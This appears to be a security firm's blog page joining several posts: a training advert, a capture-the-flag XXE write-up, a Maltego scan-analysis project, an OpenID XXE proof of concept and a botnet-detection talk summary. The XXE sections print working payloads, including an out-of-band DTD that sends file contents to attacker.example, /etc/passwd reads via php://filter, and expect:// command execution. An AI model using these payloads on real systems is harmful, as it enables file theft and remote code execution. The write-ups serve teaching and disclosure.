Web application security training in 2015?
Our response is yes. Our application assessment course changes constantly. We look at the thousands of assessments we perform for our customers, take the vulnerabilities discovered along with new architectures and designs, and build practical exploitation scenarios for our students. We love breaking the web, the cloud, 'the box that's hosted somewhere you can't recall but just works', as there are always new approaches and methods one can take to own the application layer.
Last month I discovered a vulnerability in Red Hat's OpenStack Platform. What was cool about it is that it isn't a new class of vulnerability; yet, when the platform is deployed in an organisation, it allows an authenticated user to read files on the filesystem with the permissions of the web server. Owning organisations is all about exploiting flaws and chaining them together to achieve the end goal.
We want to teach you that same process: learning how to own the application layer, whilst having fun doing it, at Black Hat Asia in Singapore.
During the course we will cover:
Come and join us! It will be fun :)
We recently ran our Black Hat challenge, where the ultimate prize was a seat on one of our training courses at Black Hat this year. This would allow the winner to attend any one of the following:
We started by simply trying out this feature and seeing how it functioned. Looking at the feed tester result, we noticed that the contents of the XML-formatted RSS feed were echoed back, and it became clear that this might be vulnerable to XXE. The first step was to try a simple XML payload.
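A classic first probe looks something like the following (the file path, element names and structure here are purely illustrative - the real payload obviously has to match whatever feed format the tester expects):

<?xml version="1.0"?>
<!DOCTYPE rss [
  <!-- Declare an external entity that points at a local file -->
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<rss version="2.0">
  <channel>
    <!-- Reference the entity somewhere the feed tester echoes back -->
    <title>&xxe;</title>
    <link>http://example.com/feed</link>
    <description>test</description>
  </channel>
</rss>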
It looked like we had some more XML being submitted. Again we tried XXE, and found that using "file://" in our payload created an error. There were ways around this, however the returned data would be truncated and we would not be able to see the full contents of flag2.txt. When you are stuck with an XXE and cannot see the result (or the complete result), there is always the chance of getting the data out via the network. To do this we needed to generate a payload that would fetch an external DTD and then "submit" the contents of our target file to a server under our control. The payload hosted on our server followed the standard out-of-band DTD pattern.
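In essence, the externally hosted DTD reads the target file and builds a second entity that ships the result back to us as a URL parameter. The sketch below shows the idea; the attacker hostname and the path to flag2.txt are placeholders, and the php:// filter assumes a PHP parser on the other end (which also explains the base64 encoding):

<!-- evil.dtd, hosted on our server; hostname and file path are placeholders -->
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/var/www/flag2.txt">
<!ENTITY % wrapper "<!ENTITY exfil SYSTEM 'http://attacker.example/?d=%file;'>">
%wrapper;

The XML submitted to the application then simply pulls in that DTD and references the entity it defines:

<?xml version="1.0"?>
<!DOCTYPE data SYSTEM "http://attacker.example/evil.dtd">
<data>&exfil;</data>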
As soon as the XML parser processed our malicious payload, we would receive the base64-encoded contents of the target file on our server.
Now it was a simple matter of decoding the payload and we had the second flag. This was not the only way to get flag 2! It was the most "fun" way of doing it though and used a really handy method. Remember it for your next pentest...
The two runners-up, who can both claim one of our awesome 2014 t-shirts, are:
Vitaly aka @send9
Sash aka @secdefect
This blog post is about the process we went through trying to better interpret the masses of scan results that automated vulnerability scanners and centralised logging systems produce. A good example of the value of getting actionable items out of this data is the recent Target compromise. Their scanning solutions detected the threat that led to their compromise, but no humans intervened. It's suspected that too many security alerts were being generated on a regular basis for anyone to act on them.
The goal of our experiment was to steer away from the usual data interrogation questions, such as "What are the top N vulnerabilities my scanner has flagged with a high threat?", towards questions like "For how many of my vulnerabilities do public exploits exist?". Near the end of this exercise we stumbled across the BSides talk "Stop Fixing All The Things". These researchers took a similar viewpoint: "As security practitioners, we care about which vulnerabilities matter". Their blog post and video are definitely worth a look.
At SensePost we have a Managed Vulnerability Scanning service (MVS). It incorporates numerous scanning agents (e.g. Nessus, Nmap, Netsparker and a few others) and exposes an API to interact with the results. This was our starting point for exploring threat-related data, which we could then couple with remote data sources (e.g. CVE data, exploit-db.com data).
We chose to use Maltego to explore the data as it's an incredibly powerful data exploration and visualisation tool, and writing transforms for it is straightforward. If you'd like to know more about Maltego, here are some useful references:
It's also worth noting that for the demonstrations that follow we've obscured our clients' names by applying a salted 'human readable hash' to their names. A side effect is that you'll notice some rather humorous entries in the images and videos that follow.
Jumping into the interesting results, these are some of the tasks that we can perform:
In summary, building 'clever tools' that combine automation with human insight can be powerful. An experienced analyst who asks the right questions, paired with tools that allow the answers to be extracted easily, yields actionable tasks in less time. We're going to start using this approach internally to find new ways to explore the vulnerability data sets of our scanning clients and see how it goes.
Going forward, we're working on incorporating other data sources (e.g. LogRhythm, Skybox). We're also upgrading our MVS API - you'll notice a lot of the Maltego queries are cumbersome and slow due to the API's current linear exploration approach.
The source code for the somewhat-PoC Maltego transforms can be downloaded from our GitHub page, and the MVS (BroadView) API from here. You'll need a paid subscription to incorporate the exploit-db.com data, but it's an initiative definitely worth supporting, with a very fair pricing model, and they put significant effort into correlating CVEs. See this page for more information.
Do get in touch with us (or comment below) if you'd like to know more about the technical details, want to chat about the API (or expand on it), would like to deploy this as a solution, or just want to say "Hi".
Recently a security researcher reported a bug in Facebook that could potentially allow Remote Code Execution (RCE). His writeup of the incident is available here if you are interested. The thing that caught my attention about his writeup was not the fact that he had pwned Facebook or earned $33,500 doing it, but the fact that he used OpenID to accomplish this. After having a quick look at the output from the PoC and rereading the vulnerability description, I had a pretty good idea of how the vulnerability was triggered and decided to see if any other platforms were vulnerable.
The basic premise behind the vulnerability is that when a user authenticates with a site using OpenID, that site does a 'discovery' of the user's identity. To accomplish this, the server contacts the identity server specified by the user, downloads information regarding the identity endpoint and proceeds with authentication. There are two ways a site may do this discovery: either through HTML or through YADIS discovery. Now this is where it gets interesting. The HTML look-up is simply an HTML document with some meta information contained in the head tags:
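Typically just a handful of link elements, along the lines of the following (the provider and identity URLs are illustrative):

<html>
  <head>
    <!-- OpenID 2.0 discovery -->
    <link rel="openid2.provider" href="https://provider.example/openid/endpoint"/>
    <link rel="openid2.local_id" href="https://provider.example/user/alice"/>
    <!-- OpenID 1.x equivalents -->
    <link rel="openid.server" href="https://provider.example/openid/endpoint"/>
    <link rel="openid.delegate" href="https://provider.example/user/alice"/>
  </head>
  <body></body>
</html>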
The YADIS discovery, on the other hand, relies on an XRDS document:
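A minimal XRDS response looks roughly like this (the endpoint URL is illustrative):

<?xml version="1.0" encoding="UTF-8"?>
<xrds:XRDS xmlns:xrds="xri://$xrds" xmlns="xri://$xrd*($v*2.0)">
  <XRD>
    <!-- Advertise the OpenID 2.0 endpoint the relying party should use -->
    <Service priority="0">
      <Type>http://specs.openid.net/auth/2.0/signon</Type>
      <URI>https://provider.example/openid/endpoint</URI>
    </Service>
  </XRD>
</xrds:XRDS>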
Now, if you have been paying attention, the potential for exploitation should be jumping out at you. XRDS is simply XML and, as you may know, wherever XML is parsed there is a good chance that an application may be vulnerable to exploitation via XML External Entity (XXE) processing. XXE is explained by OWASP and I'm not going to delve into it here, but the basic premise is that you can specify entities in the XML DTD that, when processed by an XML parser, get interpreted and 'executed'.
From the description given by Reginaldo, the vulnerability would be triggered by having the victim (Facebook) perform the YADIS discovery against a host we control. Our host would serve a tainted XRDS, and our XXE would be triggered when the document was parsed by the victim. I whipped together a little PoC XRDS document that would cause the target host to request a second file (198.x.x.143:7806/success.txt) from a server under my control. I ensured that the tainted XRDS was well-formed XML and would not cause the parser to fail (a quick check can be done using http://www.xmlvalidation.com/index.php).
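The PoC boiled down to something like the following: a DOCTYPE declaring the external entity, a first <Service> element that still looks like a legitimate OpenID endpoint, and a second <Service> element whose <URI> references the entity (the provider URL is illustrative, and the IP is masked here as it is elsewhere in this post):

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xrds:XRDS [
  <!-- External entity pointing at a file on our server -->
  <!ENTITY a SYSTEM "http://198.x.x.143:7806/success.txt">
]>
<xrds:XRDS xmlns:xrds="xri://$xrds" xmlns="xri://$xrd*($v*2.0)">
  <XRD>
    <!-- A valid-looking OpenID service so the discovery still succeeds -->
    <Service priority="0">
      <Type>http://specs.openid.net/auth/2.0/signon</Type>
      <URI>https://provider.example/openid/endpoint</URI>
    </Service>
    <!-- The second service simply references our external entity -->
    <Service priority="1">
      <Type>http://specs.openid.net/auth/2.0/signon</Type>
      <URI>&a;</URI>
    </Service>
  </XRD>
</xrds:XRDS>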
In our example the first <Service> element would parse correctly as a valid OpenID discovery, while the second <Service> element contains our XXE in the form of <URI>&a;</URI>. To test this, we spun up a standard LAMP instance on DigitalOcean and followed the official installation instructions for a popular open-source social platform that allows OpenID authentication. And then we tried out our PoC.
It worked! The initial YADIS discovery (orange) was done by our victim (107.x.x.117) and we served up our tainted XRDS document. This resulted in our victim requesting the success.txt file (red). So now we knew we had some XXE going on. Next we needed to turn this into something a little more useful and emulate Reginaldo's Facebook success. A small modification was made to our XXE payload by changing the entity declaration for our 'a' entity as follows: <!ENTITY a SYSTEM 'php://filter/read=convert.base64-encode/resource=/etc/passwd'>. This causes the PHP filter function to be applied to the input stream (the file being read) before the text is returned. This served two purposes: firstly, to ensure the file we were reading did not introduce any XML parsing errors, and secondly, to make the output a little more user friendly.
The first run with this modified payload didn't yield the expected results and simply resulted in the OpenID discovery being completed and my browser trying to download the identity file. After a quick look at the URL, I realised that OpenID expected the identity server to automatically instruct the user's browser to return to the site which initiated the OpenID discovery. As I'd just created a simple Python web server with no intelligence, this wasn't happening. Fortunately this behaviour could be emulated by hitting 'back' in the browser and then initiating the OpenID discovery again. Instead of attempting a new discovery, the victim host would use the cached identity response (with our tainted XRDS) and the result was returned in the URL.
Finally, all we needed to do was base64-decode the result from the URL and we had the contents of /etc/passwd.
This left us with the ability to read *any* file on the filesystem, provided we knew the path and the web server user had permission to access it. In the case of this particular platform, an interesting file to read would be config.php, which yields the admin username and password as well as the MySQL database credentials. The final trick was to try and turn this into RCE, as was hinted at in the Facebook disclosure. As the platform was written in PHP, we could use the expect:// handler to execute code: <!ENTITY a SYSTEM 'expect://id'>, which should execute the system command 'id'. One dependency here is that the expect module is installed and loaded (http://de2.php.net/manual/en/expect.installation.php). I'm not too sure how often this is the case, and other attempts at RCE haven't been too successful. Armed with our new XRDS document we re-enacted the steps from above and ended up with code execution.
And Boom goes the dynamite.
All in all, a really fun vulnerability to play with and a good reminder that data validation errors don't just occur in the obvious places. All data should be treated as untrusted and tainted, no matter where it originates. To protect against this form of attack in PHP, the following should be set when using the default XML parser:
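One common hardening step is to disable external entity loading for the libxml-based parsers before handling any untrusted XML, for example:

<?php
// Stop DOM, SimpleXML and XMLReader from resolving external entities
libxml_disable_entity_loader(true);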
A good document with PHP security tips can be found here: http://phpsecurity.readthedocs.org/en/latest/Injection-Attacks.html
Botconf'13, the "First botnet fighting conference", took place in Nantes, France, from 5 to 6 December 2013. Botconf aimed to bring together the anti-botnet community, including law enforcement, ISPs and researchers. To this end the conference was a huge success, especially since a lot of networking occurred over the lunch and tea breaks as well as the numerous social events organised by Botconf.
I was fortunate enough to attend as a speaker and to present a small part of my Masters research. The talk focused on the use of spatial statistics to detect Fast-Flux botnet Command and Control (C2) domains based on the geographic location of the C2 servers. This research aimed to find novel techniques that would allow for accurate and lightweight classifiers to detect Fast-Flux domains. Using DNS query responses, it was possible to identify Fast-Flux domains based on values such as the TTL, the number of A records and the number of different ASNs. In an attempt to increase the accuracy of this classifier, additional analysis was performed and it was observed that Fast-Flux domains tended to have numerous C2 servers that are widely dispersed geographically. Through the use of statistical methods employed in plant and animal dispersion statistics, namely Moran's I and Geary's C, new classifiers were created. It was shown that these classifiers could detect Fast-Flux domains with up to 97% accuracy, maintaining a False Positive rate of only 3.25% and a True Positive rate of 99%. Furthermore, it was shown that the use of these classifiers would not significantly impact current network performance and would not require changes to current network architecture.
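For reference, both statistics measure spatial autocorrelation. With $x_i$ an observed value at location $i$ (here derived from the C2 server locations), $\bar{x}$ the mean, $w_{ij}$ the spatial weight between locations $i$ and $j$, and $W = \sum_i \sum_j w_{ij}$, the standard definitions are:

$$ I = \frac{N}{W}\cdot\frac{\sum_i \sum_j w_{ij}(x_i - \bar{x})(x_j - \bar{x})}{\sum_i (x_i - \bar{x})^2}, \qquad C = \frac{(N-1)\sum_i \sum_j w_{ij}(x_i - x_j)^2}{2W\sum_i (x_i - \bar{x})^2} $$

Values of Moran's I near +1 indicate clustering and values near -1 indicate dispersion; Geary's C behaves inversely, with values above 1 indicating dispersion.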
The scripts used to conduct the research are available on GitHub and are in the process of being updated (i.e. being made human-readable): https://github.com/staaldraad/fastfluxanalysis
The following blogs provide a comprehensive round-up of the conference including summaries of the talks: